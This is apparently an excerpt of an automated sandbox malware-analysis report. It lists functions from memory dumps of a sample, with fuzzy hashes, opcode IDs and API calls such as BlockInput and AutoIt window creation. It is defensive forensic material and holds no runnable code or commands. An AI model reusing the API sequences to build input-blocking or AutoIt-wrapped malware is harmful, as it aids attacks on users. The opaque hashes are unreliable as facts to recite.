                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Variable is not of type 'Object'.
                                    • API String ID: 0-1840281001
                                    • Opcode ID: a2c90f9dd5cc8bc20d6027c25e0f54ec095902a151dd4076f001c0390941bcd8
                                    • Instruction ID: b875c86d5d18c5cd8d8451994e3837685ae163fd79f4b21fa409613dbfb14311
                                    • Opcode Fuzzy Hash: a2c90f9dd5cc8bc20d6027c25e0f54ec095902a151dd4076f001c0390941bcd8
                                    • Instruction Fuzzy Hash: 2032AB70A40208DBDF15EF90D885BEDB7B5BF05304F14805AE906AB392D779AE45CBB0
                                    Function 007B676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007B6766,?,?,00000008,?,?,007BFEFE,00000000), ref: 007B6998
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID:
                                    • API String ID: 3997070919-0
                                    • Opcode ID: 3bac898e87503e66fad122e35b6963f7c03709c3af4e9877bb8396a98f5ca494
                                    • Instruction ID: 99b159e651a50797acf8e543cebc97ea0f2686108f0c0cf324c1f6650e44b37e
                                    • Opcode Fuzzy Hash: 3bac898e87503e66fad122e35b6963f7c03709c3af4e9877bb8396a98f5ca494
                                    • Instruction Fuzzy Hash: 4AB12A716106089FDB15CF28C48ABA57BA0FF45364F29C658E999CF2A2C73DE991CB40
                                    Function 0079B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3916222277
                                    • Opcode ID: 84a8c35e30fa15d5f3b79762eeb9a115906058281232a87ae73736429aec3d92
                                    • Instruction ID: 94711c905628d4947999625a180b81183ffecf6a8fb7e4be6afd7436f06be2d4
                                    • Opcode Fuzzy Hash: 84a8c35e30fa15d5f3b79762eeb9a115906058281232a87ae73736429aec3d92
                                    • Instruction Fuzzy Hash: 63127E71900229DBCF64CF58D9806EEB7B5FF48710F14819AE849EB251EB389E81DF91
                                    Function 007FEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • BlockInput.USER32(00000001), ref: 007FEABD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: BlockInput
                                    • String ID:
                                    • API String ID: 3456056419-0
                                    • Opcode ID: 739bba16543481354f66460bba6e6ac478a4ff596f34b72ce04aab72275594a3
                                    • Instruction ID: abf509bea364d09b4591147d43ab8bf2c4bad2f2efaa2e4c46cee0bde984c055
                                    • Opcode Fuzzy Hash: 739bba16543481354f66460bba6e6ac478a4ff596f34b72ce04aab72275594a3
                                    • Instruction Fuzzy Hash: D6E01A322402049FD710EF5AD808EAABBE9BF98760F00C41AFD49C7361DA74A8408BA0
                                    Function 007A09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,007A03EE), ref: 007A09DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 999f16a166b7f88f4dbf8fc49d2822351ac410880cc62d19e2d47dfebac3536c
                                    • Instruction ID: dbc164ef71199dba0a6cbb448d498ce0d684b345564f89627a04c2b9d7e29d3d
                                    • Opcode Fuzzy Hash: 999f16a166b7f88f4dbf8fc49d2822351ac410880cc62d19e2d47dfebac3536c
                                    • Instruction Fuzzy Hash:
                                    Function 007A781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                    • Instruction ID: 9de9cf5acb52d5b5320239dd3bd6b8a44e68d074f39c1b4bedea04acadad707d
                                    • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                    • Instruction Fuzzy Hash: 2D51797260C705ABDB3C85688C9E7BF63899BD3340F18071AE886DB282C61DEE45D757
                                    Function 007B6DD9 Relevance: .6, Instructions: 637COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fdfdc416c4206aec3a0716ee3cdb98fa882229c229fe00d8eec615af9180ed60
                                    • Instruction ID: a9a1db2864f44e105d8a273ff7006876145de11ac349cba84769b583d4f5e3b8
                                    • Opcode Fuzzy Hash: fdfdc416c4206aec3a0716ee3cdb98fa882229c229fe00d8eec615af9180ed60
                                    • Instruction Fuzzy Hash: 12321122D29F414DD7379634CC22375A689AFB73C5F15D737E81AB5AAAEB29C4838100
                                    Function 0079CC39 Relevance: .6, Instructions: 635COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6a14603007304151dd2091114ad960e9a22ad2e6c15d3232f9f13e2493d40393
                                    • Instruction ID: 2c0974c4dc54ea72afc0607a6ed81035b09e10ffc84f3b3078fb0a0e7f470830
                                    • Opcode Fuzzy Hash: 6a14603007304151dd2091114ad960e9a22ad2e6c15d3232f9f13e2493d40393
                                    • Instruction Fuzzy Hash: FE321331A001178BDF2BCA68D49467D7BB1EB46310F28856BD49ADB391E63CDD81DB60
                                    Function 00787920 Relevance: .6, Instructions: 563COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e1aa0a7c90807a8291f688a39a158f8c56fb402f9d7845752442616e71e6f3bd
                                    • Instruction ID: 049f94126e5f8b90fdddfa2df5b7b92ea77477b5b46ffc7757f66f181770bdc4
                                    • Opcode Fuzzy Hash: e1aa0a7c90807a8291f688a39a158f8c56fb402f9d7845752442616e71e6f3bd
                                    • Instruction Fuzzy Hash: 952291B0A04609DFDF18DF64D845BAEB7B6FF44300F24462DE816A7291EB3AE951CB50
                                    Function 007891C0 Relevance: .5, Instructions: 475COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a8045f7bfe8d908e30f676e1e51596c693be4c489e7356d5ad3393402b40731b
                                    • Instruction ID: 06f408025fc15e1bcbeb593f237ebade63933a3fc31c5370550182001c8dd96a
                                    • Opcode Fuzzy Hash: a8045f7bfe8d908e30f676e1e51596c693be4c489e7356d5ad3393402b40731b
                                    • Instruction Fuzzy Hash: AC0293B1A00209EBDF14DF64D885BAEB7B1FF44300F14816DE916DB291EB39AE11CB91
                                    Function 007A1C77 Relevance: .3, Instructions: 254COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                    • Instruction ID: f3fcf27a3b5d90e99f2234e62ca841adac3038037f057b35bdf84e6f2a223bf5
                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                    • Instruction Fuzzy Hash: A291557220D0E34AFB29463A857403EFFE15AD33B2B5A079DE4F2CA1C5FE189954D620
                                    Function 007A19B0 Relevance: .2, Instructions: 240COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                    • Instruction ID: fba16e28dc246f3a991d4007f58b3d4cce5b52dea8a081115e02d5d2623c0491
                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                    • Instruction Fuzzy Hash: 1F9133722090E34AFB2D467A857403EFFE15AD33A2B5A479ED4F2CA1C1FD289554D620
                                    Function 007A7A4A Relevance: .2, Instructions: 237COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2c777aeafe5a893e22f51dae7d44704313cde886ff0cb0d8fed9dbaf05102ebe
                                    • Instruction ID: d6ab0774e89ef796f80137e08943d03b9bcc3caa10710f9c11013756f38a8df4
                                    • Opcode Fuzzy Hash: 2c777aeafe5a893e22f51dae7d44704313cde886ff0cb0d8fed9dbaf05102ebe
                                    • Instruction Fuzzy Hash: F8614BF1608749A6DA7C9A2C8D95BBF2398DFC3710F144B19F842DB281D61D9E42C3B6
                                    Function 007A7CA7 Relevance: .2, Instructions: 237COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07a108128df6cf39b9ff6d31ebbcf56c9946d399af5513d5910fa778c224b6bc
                                    • Instruction ID: 6d1dedaa79b422e5460e9022768be8aa872b33b478a1f0d1f22ca38d50d97304
                                    • Opcode Fuzzy Hash: 07a108128df6cf39b9ff6d31ebbcf56c9946d399af5513d5910fa778c224b6bc
                                    • Instruction Fuzzy Hash: 4C61397170C70996DE3C5A284CA9BBF2398AFC3704F144B5DE943DB281EA1EAD42C656
                                    Function 007A1706 Relevance: .2, Instructions: 232COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                    • Instruction ID: 6f0908bed1db52b5b0c6d2d1e89e61e6f17f2b070316e295acd02f0faaed5572
                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                    • Instruction Fuzzy Hash: 4D8151726090E349FB6D823A853443EFFE15AD33B1B5A079DD4F2CA1C1EE2C9954E620
                                    Function 01E435F0 Relevance: .1, Instructions: 92COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                    • Instruction ID: c01750d4d230db9ea3015ea1137802599cd62f1c37fd534d96d1b0fe6b2827f8
                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                    • Instruction Fuzzy Hash: 0341D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                    Function 007F2046 Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a73de648553bdd8d3692fa40446c3bb7708bd8a451c6fa2964373523015dbbf4
                                    • Instruction ID: e38e1583c931a7a846ad53e1b94baa2e19e7770f326c90dda2dbf79941d1ab27
                                    • Opcode Fuzzy Hash: a73de648553bdd8d3692fa40446c3bb7708bd8a451c6fa2964373523015dbbf4
                                    • Instruction Fuzzy Hash: 5B21A5326206158BDB28CE79C82267A73E5B764310F15862EE4A7C37D1DE39A904CB80
                                    Function 01E434E0 Relevance: .0, Instructions: 35COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                    • Instruction ID: 3027e957997cfeea26be0ea98a7a7e2c1b0563c2622ccec2b3256ce8a7df737b
                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                    • Instruction Fuzzy Hash: F7019278A00109EFCB44DF98D5909AEF7F5FB48310F208599D819A7701D734AE41DB80
                                    Function 01E43480 Relevance: .0, Instructions: 35COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                    • Instruction ID: b9042890f833d8a4d79ca6ac0c7564e6e8f32ca7828d1f5e92a957e5923d7191
                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                    • Instruction Fuzzy Hash: 3101AF78A00219EFCB49DF98D5909AEF7F5FF88310F208599E819A7741E730AE41DB80
                                    Function 01E41E70 Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                    Function 00802ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 00802B30
                                    • DeleteObject.GDI32(00000000), ref: 00802B43
                                    • DestroyWindow.USER32 ref: 00802B52
                                    • GetDesktopWindow.USER32 ref: 00802B6D
                                    • GetWindowRect.USER32(00000000), ref: 00802B74
                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00802CA3
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00802CB1
                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802CF8
                                    • GetClientRect.USER32(00000000,?), ref: 00802D04
                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00802D40
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802D62
                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802D75
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802D80
                                    • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802D89
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802D98
                                    • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802DA1
                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802DA8
                                    • GlobalFree.KERNEL32(00000000), ref: 00802DB3
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802DC5
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0081FC38,00000000), ref: 00802DDB
                                    • GlobalFree.KERNEL32(00000000), ref: 00802DEB
                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00802E11
                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00802E30
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00802E52
                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080303F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
